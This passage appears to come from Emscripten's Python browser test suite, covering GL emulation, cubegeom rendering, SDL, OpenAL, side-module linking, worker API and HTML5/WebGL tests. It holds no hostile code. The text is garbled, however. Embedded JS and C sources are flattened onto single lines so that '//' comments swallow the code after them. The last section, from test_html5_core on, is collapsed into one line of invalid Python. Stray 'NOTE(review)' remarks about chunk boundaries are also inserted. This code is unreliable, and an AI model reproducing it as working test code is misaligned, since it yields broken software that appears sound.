  self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_gl_vertex_buffer(self):
  self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)

@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
  self.btest('gles2_uniform_arrays.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)

@requires_graphics_hardware
def test_gles2_conformance(self):
  self.btest('gles2_conformance.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])

@requires_graphics_hardware
def test_matrix_identity(self):
  self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])

@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-sRELOCATABLE'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_pre2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sGL_DEBUG', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])  # some coverage for GL_DEBUG not breaking the build

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_pre3.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@parameterized({
  '': ([],),
  'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
  # proxy only in the simple, normal case (we can't trace GL calls when
  # proxied)
  self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)

@requires_graphics_hardware
def test_cubegeom_regal(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=True)

@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-sUSE_PTHREADS', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=False)

@requires_graphics_hardware
def test_cubegeom_proc(self):
  # The side file deliberately declares a global named like a GL function to
  # check the name collision does not break SDL_GL_GetProcAddress lookup.
  create_file('side.c', r''' extern void* SDL_GL_GetProcAddress(const char *); void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us void
*getBindBuffer() { if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer"); return glBindBuffer; } ''')
  # also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
  for opts in [[], ['-O1'], ['-Os']]:
    self.btest(Path('third_party/cubegeom', 'cubegeom_proc.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_glew(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_glew.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_color(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_color.c'), reference=Path('third_party/cubegeom', 'cubegeom_color.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_normal(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_normal.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)

@requires_graphics_hardware
def test_cubegeom_normal_dap(self):  # draw is given a direct pointer to clientside memory, no element array buffer
  self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)

@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self):  # indices do not start from 0
  self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self):  # glDrawRangeElements
  self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self):  # use glDrawArrays
  self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self):  # with quad
  self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_mt(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_mt.c'), reference=Path('third_party/cubegeom', 'cubegeom_mt.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])  # multitexture

@requires_graphics_hardware
def test_cubegeom_color2(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_color2.c'), reference=Path('third_party/cubegeom', 'cubegeom_color2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)

@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_texturematrix.c'), reference=Path('third_party/cubegeom', 'cubegeom_texturematrix.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_fog(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_fog.c'), reference=Path('third_party/cubegeom', 'cubegeom_fog.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2_vao2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao_es.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sFULL_ES2=1', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
  self.btest(Path('third_party/cubegeom', 'cubegeom_u4fv_2.c'), reference=Path('third_party/cubegeom', 'cubegeom_u4fv_2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cube_explosion(self):
  self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)

@requires_graphics_hardware
def test_glgettexenv(self):
  self.btest('glgettexenv.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])

def test_sdl_canvas_blank(self):
  self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')

def test_sdl_canvas_palette(self):
  self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')

def test_sdl_canvas_twice(self):
  self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')

def test_sdl_set_clip_rect(self):
  self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')

def test_sdl_maprgba(self):
  self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)

def test_sdl_create_rgb_surface_from(self):
  self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')

def test_sdl_rotozoom(self):
  shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
  self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)

def test_sdl_gfx_primitives(self):
  self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)

def test_sdl_canvas_palette_2(self):
  # Each pre-js selects a different palette channel via Module['arguments'];
  # the three runs compare against per-channel reference images.
  create_file('pre.js', ''' Module['preRun'].push(function() { SDL.defaults.copyOnLock = false; }); ''')
  create_file('args-r.js', ''' Module['arguments'] = ['-r']; ''')
  create_file('args-g.js', ''' Module['arguments'] = ['-g']; ''')
  create_file('args-b.js', ''' Module['arguments'] = ['-b']; ''')
  self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
  self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
  self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])

def test_sdl_ttf_render_text_solid(self):
  self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])

def test_sdl_alloctext(self):
  self.btest('sdl_alloctext.c', expected='1', args=['-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])

def test_sdl_surface_refcount(self):
  self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')

def test_sdl_free_screen(self):
  self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')

@requires_graphics_hardware
def test_glbegin_points(self):
  shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
  self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])

@requires_graphics_hardware
def test_s3tc(self):
  shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
  self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_s3tc_ffp_only(self):
  shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
  self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-sGL_FFP_ONLY', '-lGL', '-lSDL'])

@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
  shutil.copyfile(test_file('water.dds'), 'water.dds')
  self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])

@requires_graphics_hardware
def test_tex_nonbyte(self):
  self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_float_tex(self):
  self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])

@requires_graphics_hardware
def test_subdata(self):
  self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])

@requires_graphics_hardware
def test_perspective(self):
  self.btest('perspective.c', reference='perspective.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_glerror(self):
  self.btest('gl_error.c', expected='1', args=['-sLEGACY_GL_EMULATION', '-lGL'])

def test_openal_error(self):
  # NOTE(review): this argument list continues past the chunked-line boundary.
  for args in [
    [],
    ['-lopenal', '-sSTRICT'],
    # NOTE(review): continuation of test_openal_error's args list, whose header
    # precedes this chunked-line boundary.
    ['--closure=1']
  ]:
    print(args)
    self.btest('openal_error.c', expected='1', args=args)

def test_openal_capture_sanity(self):
  self.btest('openal_capture_sanity.c', expected='0')

def test_runtimelink(self):
  # Build a side module (supp.wasm) and a main module that call back and
  # forth through mutually-extern functions and globals.
  create_file('header.h', r''' struct point { int x, y; }; ''')
  create_file('supp.c', r''' #include <stdio.h> #include "header.h" extern void mainFunc(int x); extern int mainInt; void suppFunc(struct point *p) { printf("supp: %d,%d\n", p->x, p->y); mainFunc(p->x + p->y); printf("supp see: %d\n", mainInt); } int suppInt = 76; ''')
  create_file('main.c', r''' #include <stdio.h> #include <assert.h> #include "header.h" extern void suppFunc(struct point *p); extern int suppInt; void mainFunc(int x) { printf("main: %d\n", x); assert(x == 56); } int mainInt = 543; int main( int argc, const char *argv[] ) { struct point p = { 54, 2 }; suppFunc(&p); printf("main see: %d\nok.\n", suppInt); assert(suppInt == 76); return 0; } ''')
  self.run_process([EMCC, 'supp.c', '-o', 'supp.wasm', '-sSIDE_MODULE', '-O2'])
  self.btest_exit('main.c', args=['-sMAIN_MODULE=2', '-O2', 'supp.wasm'])

def test_pre_run_deps(self):
  # Adding a dependency in preRun will delay run
  create_file('pre.js', ''' Module.preRun = function() { addRunDependency(); out('preRun called, added a dependency...'); setTimeout(function() { Module.okk = 10; removeRunDependency() }, 2000); }; ''')
  for mem in [0, 1]:
    self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])

def test_mem_init(self):
  self.set_setting('WASM_ASYNC_COMPILATION', 0)
  create_file('pre.js', ''' function myJSCallback() { // called from main() Module._note(1); } Module.preRun = function() { addOnPreMain(function() { Module._note(2); }); }; ''')
  create_file('post.js', ''' Module._note(4); // this happens too early!
and is overwritten when the mem init arrives ''')
  args = ['-sWASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1']
  # with assertions, we notice when memory was written to too early
  expected = 'abort:Assertion failed: native function `note` called before runtime initialization'
  self.btest('mem_init.cpp', expected=expected, args=args)
  # otherwise, we just overwrite
  self.btest_exit('mem_init.cpp', args=args + ['-sASSERTIONS=0'])

def test_mem_init_request(self):
  # Exercise the Module.memoryInitializerRequest override: a valid URL exits
  # cleanly, a bogus one triggers the console-warn error path.
  def test(what, status):
    print(what, status)
    create_file('pre.js', ''' var xhr = Module.memoryInitializerRequest = new XMLHttpRequest(); xhr.open('GET', "''' + what + '''", true); xhr.responseType = 'arraybuffer'; xhr.send(null); console.warn = function(x) { if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) { maybeReportResultToServer('got_error'); } console.log('WARNING: ' + x); }; ''')
    self.btest('mem_init_request.cpp', expected=status, args=['-sWASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])

  self.set_setting('EXIT_RUNTIME')
  test('test.html.mem', 'exit:0')
  test('nothing.nowhere', 'got_error')

def test_runtime_misuse(self):
  # Calls ccall/cwrap/direct exports before the runtime is ready and checks
  # that assertions catch the misuse; the JS fragments below are assembled
  # into post.js in several combinations.
  post_prep = ''' var expected_ok = false; function doCcall(n) { ccall('note', 'string', ['number'], [n]); } var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization function doCwrapCall(n) { var str = wrapped(n); out('got ' + str); assert(str === 'silly-string'); } function doDirectCall(n) { Module['_note'](n); } '''
  post_test = ''' var ok = false; try { doCcall(1); ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort } catch(e) { out('expected fail 1: ' + e.toString()); assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else ABORT = false; // hackish } assert(ok === expected_ok); ok = false; try { doCwrapCall(2); ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call
will abort } catch(e) { out('expected fail 2: ' + e.toString()); assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else ABORT = false; // hackish } assert(ok === expected_ok); ok = false; try { doDirectCall(3); ok = true; // should fail and not reach here, runtime is not ready yet so any code execution } catch(e) { out('expected fail 3:' + e.toString()); assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else ABORT = false; // hackish } assert(ok === expected_ok); '''
  post_hook = r''' function myJSCallback() { // Run on the next event loop, as code may run in a postRun right after main(). setTimeout(function() { var xhr = new XMLHttpRequest(); assert(Module.noted); xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]); xhr.send(); setTimeout(function() { window.close() }, 1000); }, 0); // called from main, this is an ok time doCcall(100); doCwrapCall(200); doDirectCall(300); } ''' % self.port
  create_file('pre_runtime.js', r''' Module.onRuntimeInitialized = function(){ myJSCallback(); }; ''')
  for filename, extra_args, second_code in [
    ('runtime_misuse.cpp', [], 600),
    ('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601)  # 601, because no main means we *do* run another call after exit()
  ]:
    for mode in [[], ['-sWASM=0']]:
      print('\n', filename, extra_args, mode)
      print('mem init, so async, call too early')
      create_file('post.js', post_prep + post_test + post_hook)
      self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
      print('sync startup, call too late')
      create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
      self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
      print('sync, runtime still alive, so all good')
      create_file('post.js',
                  # NOTE(review): continuation of test_runtime_misuse's final
                  # create_file call, opened before this chunked-line boundary.
                  post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
      self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)

def test_cwrap_early(self):
  self.btest(Path('browser/cwrap_early.cpp'), args=['-O2', '-sASSERTIONS', '--pre-js', test_file('browser/cwrap_early.js'), '-sEXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')

def test_worker_api(self):
  self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
  self.btest('worker_api_main.cpp', expected='566')

def test_worker_api_2(self):
  self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-O2', '--minify=0', '-sEXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
  self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')

def test_worker_api_3(self):
  self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
  self.btest('worker_api_3_main.cpp', expected='5')

def test_worker_api_sleep(self):
  self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one', '-sASYNCIFY'])
  self.btest('worker_api_main.cpp', expected='566')

def test_worker_api_with_pthread_compilation_fails(self):
  self.run_process([EMCC, '-c', '-o', 'hello.o', test_file('hello_world.c')])
  stderr = self.expect_fail([EMCC, 'hello.o', '-o', 'a.js', '-g', '--closure=1', '-sUSE_PTHREADS', '-sBUILD_AS_WORKER=1'])
  self.assertContained("USE_PTHREADS + BUILD_AS_WORKER require separate modes that don't work together, see https://github.com/emscripten-core/emscripten/issues/8854", stderr)

def test_emscripten_async_wget2(self):
  self.btest_exit('test_emscripten_async_wget2.cpp')

@disabled('https://github.com/emscripten-core/emscripten/issues/15818')
def test_emscripten_async_wget2_data(self):
  create_file('hello.txt', 'Hello Emscripten!')
  self.btest('test_emscripten_async_wget2_data.cpp', expected='0')

def test_emscripten_async_wget_side_module(self):
  self.run_process([EMCC, test_file('browser_module.c'), '-o', 'lib.wasm', '-O2', '-sSIDE_MODULE'])
  self.btest_exit('browser_main.c', args=['-O2', '-sMAIN_MODULE=2'])

@parameterized({
  'non-lz4': ([],),
  'lz4': (['-sLZ4'],)
})
def test_preload_module(self, args):
  # Preload a side module via --preload-file and dlopen it at runtime; the
  # main program checks it appears in preloadedWasm first.
  create_file('library.c', r''' #include <stdio.h> int library_func() { return 42; } ''')
  self.run_process([EMCC, 'library.c', '-sSIDE_MODULE', '-O2', '-o', 'library.so'])
  create_file('main.c', r''' #include <dlfcn.h> #include <stdio.h> #include <emscripten.h> int main() { int found = EM_ASM_INT( return preloadedWasm['/library.so'] !== undefined; ); if (!found) { return 1; } void *lib_handle = dlopen("/library.so", RTLD_NOW); if (!lib_handle) { return 2; } typedef int (*voidfunc)(); voidfunc x = (voidfunc)dlsym(lib_handle, "library_func"); if (!x || x() != 42) { return 3; } return 0; } ''')
  self.btest_exit(
    'main.c',
    args=['-sMAIN_MODULE=2', '--preload-file', '.@/', '-O2', '--use-preload-plugins'] + args)

def test_mmap_file(self):
  create_file('data.dat', 'data from the file ' + ('.' * 9000))
  self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])

# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
  self.btest_exit('hello_world_gles.c', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])

def test_uuid(self):
  # Run with ./runner browser.test_uuid
  # We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
  # high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
  # First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
  # require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
  self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid/test.c'), '-o', 'test.js', '-luuid'])
  test_js_closure = read_file('test.js')
  # Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
  assert ").randomBytes" in test_js_closure
  assert "window.crypto.getRandomValues" in test_js_closure
  out = self.run_js('test.js')
  print(out)
  # Tidy up files that might have been created by this test.
  try_delete(test_file('uuid/test.js'))
  try_delete(test_file('uuid/test.js.map'))
  # Now run test in browser
  self.btest_exit(test_file('uuid/test.c'), args=['-luuid'])

@requires_graphics_hardware
def test_glew(self):
  # Cover all four combinations of LEGACY_GL_EMULATION and GLEW_MX.
  self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
  self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION'], expected='1')
  self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
  self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')

def test_doublestart_bug(self):
  create_file('pre.js', r''' if (!Module['preRun']) Module['preRun'] = []; Module["preRun"].push(function () { addRunDependency('test_run_dependency'); removeRunDependency('test_run_dependency'); }); ''')
  self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')

@parameterized({
  '': ([],),
  'closure': (['-O2', '-g1', '--closure=1', '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
  'pthread': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
  'legacy': (['-sMIN_FIREFOX_VERSION=0', '-sMIN_SAFARI_VERSION=0', '-sMIN_IE_VERSION=0', '-sMIN_EDGE_VERSION=0', '-sMIN_CHROME_VERSION=0', '-Wno-transpile'],)
})
@requires_threads
def test_html5_core(self, opts):
  # NOTE(review): this condition continues past the chunked-line boundary.
  if
'-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0' in opts: # In this mode an exception can be thrown by the browser, and we don't # want the test to fail in that case so we override the error handling. create_file('pre.js', ''' window.disableErrorReporting = true; window.addEventListener('error', (event) => { if (!event.message.includes('exception:fullscreen error')) { report_error(event); } }); ''') self.emcc_args.append('--pre-js=pre.js') self.btest(test_file('test_html5_core.c'), args=opts, expected='0') @requires_threads def test_html5_gamepad(self): for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: print(opts) self.btest_exit(test_file('test_gamepad.c'), args=[] + opts) @requires_graphics_hardware def test_html5_webgl_create_context_no_antialias(self): for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1']]: print(opts) self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL']) # This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer. @requires_threads @requires_graphics_hardware def test_html5_webgl_create_context(self): for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1'], ['-sUSE_PTHREADS']]: print(opts) self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-lGL']) @requires_graphics_hardware # Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it. def test_html5_webgl_create_context2(self): self.btest_exit(test_file('webgl_create_context2.cpp')) @requires_graphics_hardware # Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it. 
# (this only makes sense in the old deprecated -sDISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode) def test_html5_special_event_targets(self): self.btest(test_file('browser/html5_special_event_targets.cpp'), args=['-lGL'], expected='0') @requires_graphics_hardware def test_html5_webgl_destroy_context(self): for opts in [[], ['-O2', '-g1'], ['-sFULL_ES2=1']]: print(opts) self.btest_exit(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL']) @no_chrome('see #7373') @requires_graphics_hardware def test_webgl_context_params(self): if WINDOWS: self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with') self.btest_exit(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL']) # Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373) @requires_graphics_hardware def test_webgl_shader_source_length(self): for opts in [[], ['-sFULL_ES2=1']]: print(opts) self.btest_exit(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL']) # Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL). @requires_graphics_hardware def test_webgl_unmasked_vendor_webgl(self): self.btest_exit(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL']) @requires_graphics_hardware def test_webgl2(self): for opts in [ ['-sMIN_CHROME_VERSION=0', '-Wno-transpile'], ['-O2', '-g1', '--closure=1', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'], ['-sFULL_ES2=1'], ]: print(opts) 